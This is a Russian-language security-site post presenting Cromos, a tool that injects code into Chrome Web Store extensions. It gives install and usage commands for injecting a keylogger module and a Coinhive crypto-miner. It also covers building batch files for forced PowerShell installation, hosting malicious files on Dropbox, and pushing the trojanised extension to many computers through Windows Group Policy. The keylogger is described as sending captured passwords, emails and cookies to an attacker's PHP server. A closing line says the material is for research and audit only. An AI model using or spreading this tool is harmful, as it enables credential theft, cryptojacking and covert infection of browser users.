Cromos – загрузка и ввод кода в расширения Google Chrome – Information Security Squad
Cromos – загрузка и ввод кода в расширения Google Chrome

Cromos – это инструмент для загрузки легетивных расширений Интернет-магазина Chrome и ввода кодов в бэкраунде приложения, а также cromos годен для создания исполняемых файлов, чтобы принудительно выполнить установку через PowerShell, а также загружать файлы в Dropbox для размещения вредоносных файлов.

     Загрузка расширений
Инъекции
Загрузка файлов в Dropbox
Инфекция Windows.

Установка Cromos

 # cd $HOME/
# git clone https://github.com/fbctf/cromos
# sudo chmod -R 777 cromos/
# cd cromos && python setup.py 

Использование Cromos

Загрузка расширения

 # python cromos.py --extension {id} 

Загрузка модуля расширения и скачивания

# python cromos.py --extension {id} --load {currency/keylogger}>

Создайте пакетный файл и загрузите файлы в Dropbox

 # python cromos.py --extension {id} --build {bat} --token {dropboxToken} 

Модули

Вы также можете инъекцировать некоторые предопределенные модули в фоновом режиме, таукие как кейлоггер, виртуальную валюту.

Описание модулей

modules / keylogger Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере, поверх https или нет. Все, что вам нужно, это иметь php-сервер, например, для получения запросов, чтобы получить параметры: электронная почта, пароль, файлы cookie и userAgent.

modules / currency Этот модуль позволяет вам майнить виртуальные монеты с использованием API coinhive, вам просто нужно иметь учетную запись.

Объект групповой политики (GPO)

 

Chrome позволяет добавлять расширения с помощью объекта групповой политики Windows (GPO), если вам нужно принудительно установить на несколько компьютеров, просто выполните действия, описанные в Руководстве по развертыванию Chrome, затем измените исходное расширение с помощью нескольких изменений, которые вы можете опубликовать в своем Интернет-магазине Chrome. требуется заплатить 5 долларов США.

Скачать Cromos:

DOWNLOAD Cromos

 


Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *